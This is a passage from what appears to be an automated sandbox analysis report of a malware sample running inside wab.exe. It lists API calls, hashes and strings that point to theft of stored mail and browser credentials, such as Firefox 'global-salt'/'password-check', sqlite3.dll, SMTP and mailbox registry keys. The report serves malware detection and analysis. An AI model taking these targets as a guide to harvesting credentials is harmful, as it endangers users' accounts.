                                                              • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                              • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                                                              • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                                                              • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                              • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                              • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                              • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                              • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407725
                                                              • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                              • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407743
                                                              • Part of subcall function 004074EA: _mbscpy.MSVCRT ref: 00407550
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                            • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                            • API String ID: 2726666094-3614832568
                                                            • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                            • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                            • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                            • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                            • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                            • OpenClipboard.USER32(?), ref: 0040C1B1
                                                            • GetLastError.KERNEL32 ref: 0040C1CA
                                                            • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                            • String ID:
                                                            • API String ID: 2014771361-0
                                                            • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                            • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                            • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                            • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memcmp.MSVCRT ref: 00406151
                                                              • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                                                              • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060CC
                                                              • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060E1
                                                            • memcmp.MSVCRT ref: 0040617C
                                                            • memcmp.MSVCRT ref: 004061A4
                                                            • memcpy.MSVCRT ref: 004061C1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memcmp$memcpy
                                                            • String ID: global-salt$password-check
                                                            • API String ID: 231171946-3927197501
                                                            • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                            • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                            • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                            • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ??3@
                                                            • String ID:
                                                            • API String ID: 613200358-0
                                                            • Opcode ID: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
                                                            • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                            • Opcode Fuzzy Hash: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
                                                            • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.MSVCRT ref: 0040644F
                                                            • memcpy.MSVCRT ref: 00406462
                                                            • memcpy.MSVCRT ref: 00406475
                                                              • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                              • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                              • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                              • Part of subcall function 00404888: memcpy.MSVCRT ref: 004048FC
                                                              • Part of subcall function 00404888: memcpy.MSVCRT ref: 0040490E
                                                            • memcpy.MSVCRT ref: 004064B9
                                                            • memcpy.MSVCRT ref: 004064CC
                                                            • memcpy.MSVCRT ref: 004064F9
                                                            • memcpy.MSVCRT ref: 0040650E
                                                              • Part of subcall function 00406286: memcpy.MSVCRT ref: 004062B2
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memset
                                                            • String ID:
                                                            • API String ID: 438689982-0
                                                            • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                            • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                            • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                            • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                            • memset.MSVCRT ref: 0040330B
                                                            • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                            • strchr.MSVCRT ref: 0040335A
                                                              • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                            • strlen.MSVCRT ref: 0040339C
                                                              • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                            • String ID: Personalities
                                                            • API String ID: 2103853322-4287407858
                                                            • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                            • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                            • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                            • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetParent.USER32(?), ref: 004090C2
                                                            • GetWindowRect.USER32(?,?), ref: 004090CF
                                                            • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                            • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: Window$Rect$ClientParentPoints
                                                            • String ID:
                                                            • API String ID: 4247780290-0
                                                            • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                            • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                            • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                            • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: _strcmpi$_mbscpy
                                                            • String ID: smtp
                                                            • API String ID: 2625860049-60245459
                                                            • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                            • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                            • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                            • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                            • memset.MSVCRT ref: 00408258
                                                              • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                            Strings
                                                            • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: Close$EnumOpenmemset
                                                            • String ID: Software\Google\Google Desktop\Mailboxes
                                                            • API String ID: 2255314230-2212045309
                                                            • Opcode ID: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                                                            • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                            • Opcode Fuzzy Hash: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                                                            • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.MSVCRT ref: 0040C28C
                                                            • SetFocus.USER32(?,?), ref: 0040C314
                                                              • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: FocusMessagePostmemset
                                                            • String ID: S_@$l
                                                            • API String ID: 3436799508-4018740455
                                                            • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                            • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                            • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                            • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.MSVCRT ref: 004092C0
                                                            • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                            • _mbscpy.MSVCRT ref: 004092FC
                                                            Strings
                                                            • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfileString_mbscpymemset
                                                            • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                            • API String ID: 408644273-3424043681
                                                            • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                            • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                                            • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                            • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                              • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                                            • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                            • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                            • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                            • String ID: MS Sans Serif
                                                            • API String ID: 3492281209-168460110
                                                            • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                            • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                            • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                            • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ClassName_strcmpimemset
                                                            • String ID: edit
                                                            • API String ID: 275601554-2167791130
                                                            • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                            • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                            • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                            • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ??2@$memset
                                                            • String ID:
                                                            • API String ID: 1860491036-0
                                                            • Opcode ID: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                                            • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                            • Opcode Fuzzy Hash: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                                            • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memset$memcpy
                                                            • String ID:
                                                            • API String ID: 368790112-0
                                                            • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                            • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                            • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                            • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                            • String ID:
                                                            • API String ID: 1886415126-0
                                                            • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                            • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                            • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                            • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: strlen
                                                            • String ID: >$>$>
                                                            • API String ID: 39653677-3911187716
                                                            • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                            • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                            • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                            • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: @
                                                            • API String ID: 3510742995-2766056989
                                                            • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                            • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                            • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                            • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: _strcmpi
                                                            • String ID: C@$mail.identity
                                                            • API String ID: 1439213657-721921413
                                                            • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                            • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                            • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                            • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ??3@
                                                            • String ID:
                                                            • API String ID: 613200358-0
                                                            • Opcode ID: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                                                            • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                            • Opcode Fuzzy Hash: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                                                            • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: _ultoasprintf
                                                            • String ID: %s %s %s
                                                            • API String ID: 432394123-3850900253
                                                            • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                            • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                            • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                            • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • LoadMenuA.USER32(00000000), ref: 00409078
                                                            • sprintf.MSVCRT ref: 0040909B
                                                              • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                              • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                              • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                              • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                              • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                              • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                              • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                            • String ID: menu_%d
                                                            • API String ID: 1129539653-2417748251
                                                            • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                            • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                            • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                            • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • _mbscpy.MSVCRT ref: 004070EB
                                                              • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                              • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                            • _mbscat.MSVCRT ref: 004070FA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: _mbscat$_mbscpystrlen
                                                            • String ID: sqlite3.dll
                                                            • API String ID: 1983510840-1155512374
                                                            • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                            • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                            • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                            • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfileString
                                                            • String ID: A4@$Server Details
                                                            • API String ID: 1096422788-4071850762
                                                            • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                            • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                            • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                            • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID:
                                                            • API String ID: 3510742995-0
                                                            • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                            • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
